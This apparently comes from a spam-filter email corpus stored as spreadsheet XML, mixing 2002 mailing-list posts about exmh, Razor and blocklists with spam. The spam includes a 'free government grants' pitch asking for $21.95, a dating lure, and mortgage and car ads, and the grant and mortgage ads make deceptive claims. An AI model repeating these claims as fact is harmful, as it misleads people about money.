 enhances Google, along with a way to "Google" without a browser.  Learn a 
 neat trick with text manipulation, a Winamp plugin that you need if you 
 have a taste for MP3 music, and a slick trick with your cursor.  Our 
 Software Pick-Of-The-Issue is a great image manipulator.  And our feature 
 is an in-depth tutorial on how to handle Microsoft Words' sometimes weird 
 formatting and styles.  All that awaits you if you're a Premium subscriber 
 and it costs just $10 a year for 24 fact-packed issues.  Subscribe at the 
 NNT Store, http://www.NeatNetTricks.com/store and get on the cutting edge.
 . . . . . .
 NNT makes no endorsement or warranty, expressed or implied, with regard to 
 featured products or services. Results may vary based on operating systems 
 and other variables beyond our control.
 For info on how to subscribe, unsubscribe, or change your address, send a 
 blank email to info-neatnettricks@silver.lyris.net .
 Comments or questions about your computer and the Internet? Visit the NNT 
 Bulletin Board at http://escribe.com/computing/neatnettricks/bb/ .
 NNT is hosted by Lyris.com, the best in email list management.
 Copyright 2002 by Jack Teems. All rights reserved. Neat Net Tricks is 
 registered with the U.S. Library of Congress ISSN: 1533-4619. 
 ---
 You are currently subscribed to neatnettricks as: legit-list-neatnettricks@spamassassin.taint.org
 To unsubscribe send a blank email to leave-neatnettricks-2424157K@silver.lyris.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CVS report
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
 large (&gt;100 msgs) unseen sequences. Anybody else having this problem?
 /A
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;snip&gt;
 &gt;SPEWS: to force ISPs to take action against spammers 
 &gt;
 &gt;SPEWS /will/ list entire ISP netblocks /if/ the ISP consistently
 &gt;ignores/fails to take action on abuse reports over the course of
 &gt;several months. however, they're pretty quick at delisting once action
 &gt;is taken. in the long-term, and in absence of global and effective 
 &gt;anti-UCE regulations, it's the only realistic way to get to a spam 
 &gt;free internet.
 &gt;
 &gt;Open relay lists: to protect against relays obviously.
 Is this something along the same line as ORBS?
 I remember not so long ago when eircom was put
 on the ORBS list, half the ISP's in Europe wouldn't
 accept mail from my address. Of course, informing
 Eircom of this did nothing for about 4 months or so.
 IMHO stopping spammers is a great idea but I'd rather
 have to hit d or delete rather than have my messages
 bounced by someone else's ISP.
 &lt;/rant&gt;
 Regards,
 Shane
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;&lt;/font&gt;&lt;/a&gt;&lt;font size="1" color="#FFFFFF"&gt;v&lt;/font&gt;&lt;/span&gt;&lt;/TD&gt;
                     &lt;/TR&gt;
                     &lt;TR VALIGN=TOP ALIGN=LEFT&gt;
                         &lt;TD&gt;&lt;/TD&gt;
                         &lt;TD WIDTH=575 CLASS="TextObject"&gt;
                             &lt;P CLASS="header" align="center"&gt;&lt;b&gt;&lt;font size="4"&gt;America's #1 Government Grant Program!&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;The Federal Government Gives Away Billions of Dollars In Grants Each &amp;amp; Every Year (Free
                             Money!)
                             Take Advantage Of This Opportunity Today And Change Your Life
                             Forever!&lt;/P&gt;
                             &lt;P STYLE="text-align: center;"&gt;&lt;B&gt;&lt;SPAN STYLE="color: rgb(255,0,0);"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/B&gt;
 &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
 &lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;B&gt;&lt;SPAN STYLE="color: rgb(255,0,0);"&gt; 30 DAY MONEY BACK GUARANTEE!&amp;nbsp;
                             &lt;/SPAN&gt;&lt;/B&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Can't wait on the mail?
                             You can receive our fabulous Grant Guide Book in one easy Download! Start searching for Grants In Minutes! Simply order your Grant Guide Book today by sending
                             $21.95 Cash, Check or Money Order with your e-mail address enclosed to:&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                            &lt;/font&gt;&lt;/a&gt;&lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; &lt;/font&gt;&lt;P STYLE="text-align: justify;"&gt;Government Grants &amp;amp; Loans&amp;nbsp;&lt;BR&gt;
 P.O. Box 101262&amp;nbsp;
                                 &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;BR&gt;Cape Coral FL 33910&amp;nbsp; &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;&lt;/font&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Free Cash Grants are being funded by the
                             U.S. Government and Private Foundations each and every day. These Grants are Funded from Your Tax Dollars. The Private Foundations Use the Grants as a Tax Write-Off! This Free Money can be used for any purpose you can imagine. Start a Business, Go to College, Buy a House, Medical Bills, or Even Personal Needs. Learn How to apply for and receive Pell Grants &amp;amp; Scholarships. There is Free Money available for virtually any use including personal! Even learn how to apply for Low Interest and No Interest Government Loans!&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Government Grant Facts:&lt;/B&gt;&lt;BR&gt;Want to start a Business? Or Expand your existing Business? Our Government is Giving away Over 5 Billion dollars in Business grants and low-interest loans. More than 10,000,000 deserving people are getting Free Money to Build their Dreams! What are you waiting for? Let Uncle Sam Finance Your Business Today.&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Attention College Students:&lt;/B&gt;&lt;BR&gt;A huge Amount of money is out there for you. Incredibly enough the U.S. Government does care about Your Education! Over 3 Billion Dollars for College Grants, Pell grants &amp;amp; Scholarships is Given Away. No credit checks or collateral required. Start Applying Online now! There are Low Interest and No Interest Government Loans also Available. There are also Special grants for Research &amp;amp; Technology.&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                            &lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; &lt;/font&gt;
 &lt;/font&gt;&lt;/a&gt;&lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; &lt;/font&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Good News For Women &amp;amp; Minorities:&lt;/B&gt;&lt;BR&gt;Two billon dollars of free money is available for you from starting a business to personal grants. Take Advantage Of this opportunity! This is your tax money, get your share today!&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Purchase Your Dream Home or Get Money for Home Improvements:&amp;nbsp;
                             &lt;/B&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
 &lt;/span&gt;&lt;BR&gt;Government housing grants, low interest and no interest loans are available. Learn about the FHA; who they are and how they can help you!&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;P STYLE="text-align: justify;"&gt;There are also reserved free government cash grants now available for the following special interest groups:&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;UL&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;American Indians&amp;nbsp;
                                   &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Veterans &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Family Members of Veterans &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Low Income Families &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Community Block Grants &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Non Profit Organizations &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;First Time Home Buyers &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Artists &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Musicians&amp;nbsp;
                                   &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Nurses &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Teachers &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Researchers &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;The Disabled &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;People Suffering From HIV and AIDS &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Substance Abuse&amp;nbsp;
                                   &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;There are literally millions available; all you have to do is ask!&lt;/LI&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Attention:&amp;nbsp; &lt;/B&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;BR&gt;None of these Grants require a credit check, collateral, security deposits or co-signers.&amp;nbsp; You can apply even if you have a bankruptcy or bad credit, it doesn't matter. Its free money, never repay!&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Our Grant Guide Program Includes:&amp;nbsp;
                                 &lt;LI STYLE="text-align: justify;"&gt;Information on how to write your grant proposal.&amp;nbsp;
                                 &lt;LI STYLE="text-align: justify;"&gt;Complete listing of grants by category &amp;amp; agency! &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Complete listing of college scholarships, grants ! &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Information on amount of funding available! &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Complete Information on low interest &amp;amp; no interest loans!&amp;nbsp;
                                 &lt;LI STYLE="text-align: justify;"&gt;Phone numbers &amp;amp; addresses of grant sources! &lt;/LI&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Free Shipping &amp;amp; Handling for A Limited Time!&lt;/B&gt;&lt;BR&gt;
                             &lt;BR&gt;30 DAY MONEY BACK GUARANTEE!&lt;BR&gt; If you do not like our wonderful product for ANY reason and you would like your money back, simply return your order and you will be refunded.&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Order now by sending $21.95 Cash, Check, or Money Order to:&lt;/P&gt;
                             &lt;UL&gt;
                                 &lt;P STYLE="text-align: justify;"&gt;Government Grants &amp;amp; Loans&lt;BR&gt;P.O. Box 101262&lt;BR&gt;Cape Coral FL 33910&lt;/P&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Electronic Delivery of Grant Guide:&lt;/B&gt;&lt;BR&gt;Can't wait on snail mail? Copies of the Grant Guide book are also available via E-Mail. When you send off for your fabulous book enclose your e-mail address and we will send the book to your e-mail account A.S.A.P.!
                             &lt;P STYLE="text-align: justify;"&gt;We have assembled a team of highly trained professionals which in turn has created the finest free cash grant program in America. We have dedicated ourselves to providing a quality program that provides not only hundreds of free cash sources but also instructs you in the most important step, and that is the
                             proposal.&lt;BR&gt;&lt;BR&gt;
                             &lt;BR&gt; &lt;BR&gt; &lt;BR&gt;&lt;P align="center"&gt;&lt;span style="font-size: 10.0pt; font-family: Impact; color: #3737FF"&gt;To remove your email address from
                             our mailing list please
                             &lt;a href="http://www.fillout.html"&gt; Click Here&lt;/a&gt; 
                         &lt;/TD&gt;
                     &lt;/TR&gt;
                     &lt;TR VALIGN=TOP ALIGN=LEFT&gt;
                         &lt;TD COLSPAN=2 HEIGHT=6&gt;
                     &lt;/TR&gt;
                 &lt;/TABLE&gt;
             &lt;/TD&gt;
         &lt;/TR&gt;
     &lt;/TABLE&gt;
     &lt;p&gt;
 &lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; v&amp;nbsp; v&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 wpeiycjkquuferakoenjaxo
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Tony Nugent &lt;tony@linuxworks.com.au&gt;
 &gt; Sender: exmh-users-admin@example.com
 &gt; Date: Sat, 14 Sep 2002 13:20:58 +1000
 &gt; 
 &gt; On Fri Sep 13 2002 at 07:46, "Kevin Oberman" wrote:
 &gt; 
 &gt; &gt; &gt; &gt; What is an example of an "anything else" that it fails for for you?
 &gt; &gt; &gt;
 &gt; &gt; &gt; Everything else :)  I can't even mark text in an exmh message window
 &gt; &gt; &gt; and then paste it into a terminal window, the cut buffer seems to be
 &gt; &gt; &gt; completely empty (and its previous contents are no longer there
 &gt; &gt; &gt; either).
 &gt; 
 &gt; &gt; (This is all guess work and may be bogus.)
 &gt; &gt; 
 &gt; &gt; Are you running Gnome 1.4? I had similar problems as did several
 &gt; &gt; co-workers. Updating my Gnome components has fixed it for me and
 &gt; &gt; others, although I can't say exactly which component did the
 &gt; &gt; trick. Gnomecore or gtk would seem most likely, but it may have been
 &gt; &gt; something else.
 &gt; 
 &gt; Indeed I am (this workstation is rh7.2 with gnome1.4, it [mostly?]
 &gt; works, so I hadn't bothered to updated it to 7.3:)
 &gt; 
 &gt; &gt; In any case, I have not seen the problem for quite a while, now.
 &gt; 
 &gt; So upgrading gnome will fix the problem, it's not an exmh/tktcl
 &gt; issue.
 It did for me, but I am not willing to say it is not a tcl/tk issue as
 other apps seemed to work OK for cut and paste and Tk does its
 clipboard stuff a bit differently than most toolkits. So I'm not
 about to place blame. Just reporting my experience.
 Also, I am not talking about installing Gnome2. Just updating the
 many, many pieces of gnome to the current rev level.
 R. Kevin Oberman, Network Engineer
 Energy Sciences Network (ESnet)
 Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
 E-mail: oberman@es.net			Phone: +1 510 486-8634
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Isn't eBays trust the feedback?
 ----- Original Message -----
 From: "Chip Paswater" &lt;turk182@chipware.net&gt;
 To: "Patrick" &lt;patrick@stealthgeeks.net&gt;
 Cc: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Wednesday, August 14, 2002 9:51 PM
 Subject: Re: [Razor-users] Re: What's wrong with the Razor servers now?
 &gt; &gt; &gt; It's not my desire to second-guess you Vipul (however much my missives
 &gt; &gt; &gt; may appear otherwise) or question the hard work you and the other
 &gt; &gt; &gt; developers have put into the system, however it seems that every
 request
 &gt; &gt; &gt; for such information has been met with silence.
 &gt; &gt;
 &gt; &gt; There are no plans for releasing details about TeS. Before the
 &gt; &gt; release of Razor2, I'd pointed out that Razor2 backend (specially
 &gt; &gt; TeS) will be closed.
 &gt;
 &gt; Thanks for the clarification. Guess it's time to find something that is
 &gt; open.
 &gt;
 &gt; Good luck.
 Why do the details of the backend need to be open?
 I don't think that Ebay publishes it's proprietary trust backend, why
 should Razor?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
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I thought it was important          YMF
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 Hello&lt;BR&gt;
 My name is Natalie. I live in St.Petersberg and I am looking&lt;br&gt;
 for a real relationship with a real man. I signed up with this internet&lt;br=
 &gt;
 service to meet good western men -- I hope you are really there.&lt;br&gt;
 &lt;A HREF=3D"http://www.bestphotosite.com/?oc=3D5049"&gt;Please see and write m=
 e here if you like me&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get The BEST PRICE on Your Next CAR!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Exclusive offer from 24x7eMessaging&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;blockquote MARGIN-LEFT: 5px; BORDER-LEFT: #008000 2px solid?&gt;
   &lt;table borderColor="#000000" height="740" cellSpacing="1" cellPadding="1" width="550" align="center" bgColor="#000000" border="0"&gt;
     &lt;tbody&gt;
       &lt;tr bgColor="#ffffff"&gt;
         &lt;td height="736"&gt;
           &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Verdana" size="5" color="#000080"&gt;Exclusive
           offer from 24x7eMessaging&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;table height="661" cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
             &lt;tbody&gt;
               &lt;tr bgColor="#ffffff"&gt;
                 &lt;td height="46"&gt;&lt;a href="http://www.qksrv.net/click-1095548-513237"&gt;&lt;img border="0" src="http://www.7a6a.net/images/autobytel/Autoby1.jpg" width="468" height="101"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgColor="#ffffff"&gt;
                 &lt;td height="46"&gt;&lt;map name="FPMap1"&gt;
                   &lt;area href="http://www.qksrv.net/click-1095548-5684914" shape="rect" coords="58, 5, 139, 31"&gt;&lt;/map&gt;&lt;img border="0" src="http://www.7a6a.net/images/autobytel/Autoby2.gif" usemap="#FPMap1" width="417" height="57"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgColor="#ffffff"&gt;
                 &lt;td height="255"&gt;
                   &lt;table height="235" cellSpacing="1" cellPadding="1" width="588" bgColor="white" border="0"&gt;
                     &lt;tbody&gt;
                       &lt;tr&gt;
                         &lt;td height="156" colspan="2" width="580"&gt;&lt;img src="http://a904.g.akamai.net/7/904/506/v0003/www.autobytel.com/images/home/home1128a.jpg" useMap="#FPMap0" border="0" width="579" height="245"&gt;&lt;map name="FPMap0"&gt;
                           &lt;area href="http://www.qksrv.net/click-1095548-805070" shape="rect" coords="247, 2, 546, 22"&gt;
                           &lt;area href="http://www.qksrv.net/click-1095548-5684911" shape="rect" coords="299, 52, 536, 70"&gt;
                           &lt;area href="http://www.qksrv.net/click-1095548-7153731" shape="rect" coords="286, 190, 414, 210"&gt;
                           &lt;area href="http://www.qksrv.net/click-1095548-5684911" shape="rect" coords="121, 195, 240, 210"&gt;
                           &lt;area href="http://www.qksrv.net/interactive" shape="rect" coords="122, 214, 241, 229"&gt;
                           &lt;area href="http://www.qksrv.net/click-1095548-513237" shape="rect" coords="309, 120, 452, 140"&gt;
                           &lt;area href="http://www.qksrv.net/click-1095548-5684911" shape="rect" coords="22, 188, 124, 244"&gt;&lt;/map&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td height="75" width="292"&gt; 
                           &lt;p align="center"&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt; &lt;a href="http://www.qksrv.net/click-1095548-5684913" onmouseover="window.status='http://www.autobytel.com';return true;" onmouseout="window.status=' ';return true;" target="_blank"&gt;Search for a Pre-Owned Vehicle&lt;/a&gt;&lt;img src="http://www.7a6a.net/images/autobytel/image-1095548-5684913.gif" border="0" width="1" height="1"&gt; &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
  &lt;/td&gt;
                         &lt;td height="75" width="282"&gt; 
                           &lt;p align="center"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;font size="2" face="Arial"&gt;&lt;b&gt; &lt;a href="http://www.qksrv.net/click-1095548-5684912" onmouseover="window.status='http://www.autobytel.com';return true;" onmouseout="window.status=' ';return true;" target="_blank"&gt;Buy a Used Car Online&lt;/a&gt;&lt;img src="http://www.7a6a.net/images/autobytel/image-1095548-5684912.gif" border="0" width="1" height="1"&gt; &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
  &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/tbody&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgColor="#ffffff"&gt;
                 &lt;td height="54"&gt;
                   &lt;p style="text-indent: 0px; margin-top: 0px; margin-bottom: 2px"&gt;&lt;font face="Verdana" size="1"&gt;You've
                   received this message because you have signed up to receive
                   offers from&amp;nbsp; one of our carefully selected marketing
                   partners.&lt;/font&gt;&lt;/p&gt;
                   &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;font face="Verdana" size="1"&gt;24x7eMessaging
                   is the internet's best source of exciting new offers and
                   discounts. If you no longer wish to receive these offers,
                   please follow the unsubscribe instructions at the bottom.&lt;/font&gt;&lt;/p&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgColor="#ffffff"&gt;
                 &lt;td height="22"&gt;
                   &lt;p style="word-spacing: 0; margin-left: 0; margin-right: 0; margin-top: 1; margin-bottom: 0"&gt;&amp;nbsp;
                   &lt;p align="center" style="word-spacing: 0; margin-left: 0; margin-right: 0; margin-top: 1; margin-bottom: 0"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#000000" size="1"&gt;To
                   unsubscribe from our mailing list, please&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#ff0000" size="1"&gt;
                   &lt;/font&gt;&lt;a href="http://weboffers.7a6a.net/weboffers/unsubscribe.asp?id=jm@netnoteinc.com"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#000080" size="1"&gt;Click
                   Here&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/tbody&gt;
           &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/tbody&gt;
   &lt;/table&gt;
 &lt;/blockquote&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_480_83855460462270663
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 We will help you get the mortgage loan you want! 
 Only takes 2 minutes to fill out our form. 
 http://xnet.123alias.com/index.php
 Whether a new home loan is what you seek or to refinance your current home =
 loan
 at a lower interest rate and payment, we can help!
 Mortgage rates haven't been this low in the last 12 months, take action now!
 Refinance your home with us and include all of those pesky credit card bills =
 or
 use the extra cash for that pool you've always wanted... 
 Where others says NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help! 
 Easy terms! Our mortgage referral service combines the
 highest quality loans with most economical rates and the easiest =
 qualification!
 Click Here to fill out our form. 
 http://xnet.123alias.com/index.php
 ------=_NextPart_480_83855460462270663
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: Quoted-Printable
 &lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Mortgage companies make you wait&lt;/TITLE&gt;
 &lt;META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR&gt;
 &lt;/head&gt;
 &lt;BODY bgProperties=3Dfixed leftMargin=3D10 topMargin=3D10 marginwidth=3D"0" =
 marginheight=3D"0" NOSEND=3D"1"&gt;
 &lt;BLOCKQUOTE dir=3Dltr style=3D"PADDING-LEFT: 0px; MARGIN-LEFT: 5px; BORDER-LEFT: =
 #0000af 5px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV align=3Dcenter&gt;
   &lt;CENTER&gt;
   &lt;TABLE width=3D540 height=3D1 cellSpacing=3D1 border=3D0&gt;
     &lt;TBODY&gt;
     &lt;TR&gt;&lt;TD colspan=3D2&gt;
       &lt;P align=3Dcenter&gt;&lt;/FONT&gt;&lt;BIG&gt;&lt;STRONG&gt;&lt;FONT face=3DTahoma =
 color=3D#008000&gt;Mortgage companies make you wait...They Demand to Interview you..=
 They &lt;U&gt;Intimidate&lt;/U&gt; you...They &lt;U&gt;Humiliate&lt;/U&gt; you...And All of That is =
 While They Decide If They Even Want to Do Business With You...=
 &lt;/STRONG&gt;&lt;/BIG&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000 size=3D5&gt;&lt;STRONG&gt;We Turn the Tables =
 on Them...&lt;BR&gt;Now, You're In Charge&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000&gt;&lt;SMALL&gt;&lt;B&gt;Just Fill Out Our Simple =
 Form and They Will Have to Compete For Your Business...&lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;&lt;BR&gt;&lt;A =
 href=3D"http://xnet.123alias.com/index.php" =
 Target=3D"_NEW"&gt;&lt;BIG&gt;&lt;BIG&gt;&lt;STRONG&gt;CLICK HERE FOR THE =
 FORM&lt;/STRONG&gt;&lt;/BIG&gt;&lt;/BIG&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;BR&gt;
     &lt;/TD&gt;&lt;/TR&gt;
     &lt;TR&gt;
       &lt;TD vAlign=3Dcenter width=3D50%&gt;&lt;STRONG&gt;&lt;FONT size=3D2 face=3DTahoma =
 color=3D#000000&gt;We have hundreds of loan programs, including:&lt;/FONT&gt;&lt;/STRONG&gt;
           &lt;B&gt;&lt;FONT size=3D2 face=3DTahoma color=3D#008000&gt;
             &lt;UL&gt;
               &lt;LI&gt;Purchase Loans
               &lt;LI&gt;Refinance
               &lt;LI&gt;Debt Consolidation
               &lt;LI&gt;Home Improvement
               &lt;LI&gt;Second Mortgages
               &lt;LI&gt;No Income Verification
             &lt;/UL&gt;&lt;/FONT&gt;&lt;/B&gt;
        &lt;/TD&gt;
        &lt;TD width=3D50% valign=3Dtop&gt;
 		 &lt;BLOCKQUOTE dir=3Dltr style=3D"PADDING-LEFT: 25px; MARGIN-LEFT: 0px; =
 BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
 		 &lt;DIV align=3Dcenter&gt;&lt;CENTER&gt;&lt;P align=3Djustify&gt;You can save &lt;I&gt;&lt;B&gt;&lt;U&gt;Thousands =
 Of Dollars&lt;/U&gt;&lt;/B&gt;&lt;/I&gt; over the course of your loan with just a 1/4 of 1% Drop =
 in your rate!&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/DIV&gt;
        &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt;
 	  &lt;TD colspan=3D2&gt;
 	    &lt;BR&gt;&lt;P align=3Dcenter&gt;&lt;A href=3D"http://xnet.123alias.com/index.php" =
 Target=3D"_NEW"&gt;&lt;FONT face=3DTahoma color=3D#0000ff&gt;&lt;BIG&gt;&lt;BIG&gt;&lt;STRONG&gt;CLICK HERE FOR =
 THE FORM&lt;/STRONG&gt;&lt;/BIG&gt;&lt;/BIG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
         &lt;P align=3Dcenter&gt;&lt;FONT face=3DTahoma size=3D3 color=3D#000000&gt;&lt;STRONG&gt;You =
 will often be contacted with an offer the&lt;br&gt;very same day you fill out the =
 form!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
   &lt;/TABLE&gt;
  &lt;p&gt;
 &lt;hr WIDTH=3D"600"&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D10 WIDTH=3D"600" =
 BGCOLOR=3D"#FFFFCC" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&lt;font color=3D"#000000"&gt;This
 email was sent to you via Saf-E Mail Systems.&amp;nbsp; Your email address
 was automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver &lt;b&gt;IS NOT &lt;/b&gt;being used for the sending of this mail.
 No-one else is receiving emails from your address. You may utilize the
 removal link below if you do not wish to receive this mailing. &lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;Please &lt;a href=3D"http://xnet.123alias.com/remove.html"&gt;Remove =
 Me&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
